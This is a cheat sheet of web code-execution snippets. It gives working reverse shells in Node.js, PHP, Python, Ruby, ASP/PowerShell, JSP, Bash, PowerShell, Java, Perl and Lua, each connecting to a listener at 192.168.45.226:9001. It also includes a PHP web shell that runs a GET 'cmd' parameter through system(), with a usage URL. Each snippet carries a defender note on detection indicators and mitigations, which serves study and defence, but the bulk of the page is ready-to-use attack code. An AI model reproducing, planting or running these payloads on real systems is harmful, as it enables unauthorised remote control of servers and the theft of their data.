Code Execution - Web Snippets
Node.js - Reverse Shell via child_process
// Spawns /bin/bash and hands it a one-liner that starts an interactive bash
// with stdin/stdout/stderr redirected over /dev/tcp to 192.168.45.226:9001
// (the listener address used throughout this page).
// Defender note: the host-side observable is a Node process spawning
// /bin/bash together with a new outbound TCP connection to a non-application
// host; egress filtering and process-spawn telemetry on web workers both
// surface this pattern.
import { exec } from 'child_process';
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.226/9001 0>&1'");
// Printed locally whether or not the connection above succeeded: exec() is
// asynchronous and no completion/error callback is supplied.
console.log("Test executed!");
Node.js - Reverse Shell via spawn
// Same effect as the exec() variant, built from Node primitives instead of
// a bash one-liner: a /bin/sh child whose stdio is bridged to a TCP socket.
// Defender note: because the shell is spawned with no arguments and the
// socket is opened from JavaScript, there is no "/dev/tcp" string to match
// on; the reliable signals are the web process spawning /bin/sh and the
// outbound connection to 192.168.45.226:9001 from that same process.
const { spawn } = require('child_process');
const sh = spawn('/bin/sh', []);
const net = require('net');
const client = new net.Socket();
// On connect, wire socket -> shell stdin and shell stdout/stderr -> socket.
// No 'error' handler is registered on the socket or the child; a refused
// connection surfaces as an unhandled 'error' event.
client.connect(9001, '192.168.45.226', () => {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
PHP - Reverse Shell
<?php
// Opens a TCP connection to 192.168.45.226:9001 and then runs an interactive
// /bin/sh whose fds 0/1/2 are redirected to file descriptor 3.
// The "<&3 >&3 2>&3" redirections assume the socket opened by fsockopen()
// is inherited by the child as fd 3 — true only when no other descriptor was
// opened first; with a different fd number the shell simply runs detached.
// Defender note: php-fpm/apache spawning /bin/sh with a socket on its stdio
// is the process-level indicator; disable_functions covering exec/system/
// popen/proc_open and outbound egress rules on web tiers are the mitigations.
$sock=fsockopen("192.168.45.226",9001);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
PHP - Command Execution via system
<?php
// Minimal web shell: the raw GET parameter "cmd" is passed straight to
// system(), which runs it through the OS shell and echoes its output into
// the HTTP response. No validation, quoting or authentication of any kind.
// Defender note: the request-side indicator is a query string carrying shell
// syntax (e.g. cmd=id) in access logs; the host-side indicator is the web
// server worker spawning sh. The fix in any real application is to never
// pass request input to system()/exec()/passthru(), and to disable those
// functions in php.ini where they are not needed.
if(isset($_GET['cmd'])) {
system($_GET['cmd']);
}
?>
Usage: http://target.com/shell.php?cmd=id
Python - Reverse Shell
# Connects to 192.168.45.226:9001, then duplicates the socket's descriptor
# onto fds 0, 1 and 2 so that the /bin/sh child inherits the socket as its
# stdin/stdout/stderr. subprocess.call() blocks until the shell exits.
# Defender note: the indicator is a python process whose stdio descriptors
# point at a TCP socket and that has /bin/sh as a child; auditd/eBPF
# execve+connect correlation and egress filtering both apply.
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.45.226",9001))
# dup2 onto the three standard descriptors; no error handling if connect() failed.
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
subprocess.call(["/bin/sh","-i"])
Ruby - Reverse Shell
# Line-oriented command loop rather than an interactive shell: each line read
# from the socket is run via IO.popen and its complete output sent back.
# Defender note: this variant spawns a fresh shell process per command, so
# process-creation telemetry shows a ruby parent repeatedly forking sh with
# varying command lines; the outbound connection to 192.168.45.226:9001 is
# the network indicator.
require 'socket'
c=TCPSocket.new("192.168.45.226",9001)
# gets returns nil when the peer closes, which ends the loop.
while(cmd=c.gets)
IO.popen(cmd,"r"){|io|c.print io.read}
end
ASP - Reverse Shell
<%
' Classic ASP: uses WScript.Shell to run cmd.exe, which launches PowerShell
' with the same TCPClient/iex loop shown in the PowerShell section below.
' Defender note: w3wp.exe (or the IIS worker) spawning cmd.exe -> powershell.exe
' with a long inline -c script is a high-signal process chain; PowerShell
' script block logging captures the decoded command, and constrained language
' mode / AppLocker limit what iex can run.
Set s=Server.CreateObject("WScript.Shell")
Set e=s.Exec("cmd.exe /c powershell -nop -c $client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()")
' ReadAll blocks until the child's stdout closes, i.e. until the PowerShell
' loop ends, so the HTTP request itself stays open for the session's lifetime.
Response.Write e.StdOut.ReadAll()
%>
JSP - Reverse Shell
<%
// JSP scriptlet: Runtime.exec() launches bash with the same /dev/tcp one-liner
// used in the Bash section. The Process handle is discarded, so the servlet
// container never sees the shell's exit status or output.
// Defender note: the JVM (java/tomcat) spawning bash with "/dev/tcp" in the
// command line is the process indicator; a Java SecurityManager/seccomp policy
// that forbids process creation from the container removes the capability.
Runtime.getRuntime().exec("bash -c 'bash -i >& /dev/tcp/192.168.45.226/9001 0>&1'");
%>
Bash - Reverse Shell
bash -i >& /dev/tcp/192.168.45.226/9001 0>&1
PowerShell - Reverse Shell
# TCP read/eval loop: each chunk received from 192.168.45.226:9001 is decoded
# as ASCII, evaluated with Invoke-Expression, and the output plus a fake
# "PS <cwd>> " prompt is written back.
# Defender note: a 64 KiB buffer, Net.Sockets.TCPClient and iex in the same
# script are the classic signature; PowerShell script block logging (Event
# 4104) records the full text even when it is passed inline with -c, and
# AMSI-integrated AV scans it before execution.
$client = New-Object System.Net.Sockets.TCPClient('192.168.45.226',9001);
$stream = $client.GetStream();
# 65536-byte zero-filled receive buffer.
[byte[]]$bytes = 0..65535|%{0};
# Read returns 0 when the peer closes the connection, ending the loop.
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
# iex runs the received text as PowerShell; 2>&1 merges errors into the reply.
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush()
};
$client.Close()
Java - Reverse Shell
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.Socket;
/**
 * Starts an interactive /bin/bash and bridges its stdio to a TCP socket
 * connected to 192.168.45.226:9001 (stderr is merged into stdout via
 * redirectErrorStream).
 *
 * Defender note: the pattern of interest is a JVM that both spawns bash and
 * opens an outbound socket, then busy-polls both streams in an infinite loop
 * with no sleep — the latter makes the process stand out on CPU as well as
 * in network and process telemetry. Neither the socket nor the process is
 * ever closed; the loop only ends if an IOException propagates out of main.
 */
public class ReverseShell {
public static void main(String[] args) throws IOException {
String host = "192.168.45.226";
int port = 9001;
// stderr merged into stdout so a single stream carries all shell output.
Process process = new ProcessBuilder("/bin/bash", "-i").redirectErrorStream(true).start();
Socket socket = new Socket(host, port);
InputStream processInput = process.getInputStream();
OutputStream processOutput = process.getOutputStream();
InputStream socketInput = socket.getInputStream();
OutputStream socketOutput = socket.getOutputStream();
// Busy-poll: copy whatever is available in each direction, one byte at a
// time, then flush. available() returning 0 does not block, so this loop
// spins continuously.
while (true) {
while (processInput.available() > 0) {
socketOutput.write(processInput.read());
}
while (socketInput.available() > 0) {
processOutput.write(socketInput.read());
}
socketOutput.flush();
processOutput.flush();
}
}
}
Perl - Reverse Shell
# Connects a raw socket S to 192.168.45.226:9001, redirects STDIN/STDOUT/STDERR
# onto that socket with the ">&S" dup form of open(), then replaces the perl
# process with an interactive /bin/sh via exec().
# Defender note: because exec() replaces the image, the surviving process is
# /bin/sh whose stdio is a socket and whose parent is whatever launched perl;
# the perl command line itself is short-lived in process logs.
use Socket;
$ip = "192.168.45.226";
$port = 9001;
socket(S, PF_INET, SOCK_STREAM, getprotobyname("tcp"));
# Return value of connect() is not checked; on failure the shell still runs
# with its stdio attached to an unconnected socket.
connect(S, sockaddr_in($port, inet_aton($ip)));
open(STDIN, ">&S");
open(STDOUT, ">&S");
open(STDERR, ">&S");
exec("/bin/sh -i");
Lua - Reverse Shell
-- Line-oriented command loop using LuaSocket (require("socket") is the
-- third-party luasocket module, not part of the Lua standard library).
-- Each line received from 192.168.45.226:9001 is run through io.popen and
-- its full output sent back.
-- Defender note: as with the Ruby variant, a new shell process is forked per
-- received line, so process telemetry shows a lua parent repeatedly spawning
-- sh with differing command lines alongside a single long-lived outbound
-- connection.
local host, port = "192.168.45.226", 9001
local socket = require("socket")
local tcp = socket.tcp()
-- connect()'s status/error return values are ignored.
tcp:connect(host, port)
while true do
-- receive() yields nil on a closed connection; io.popen(nil) then raises,
-- which is the only way out of this loop.
local cmd = tcp:receive()
local f = io.popen(cmd, "r")
local s = f:read("*a")
f:close()
tcp:send(s)
end
-- Unreachable in normal flow: the loop above never terminates by itself.
tcp:close()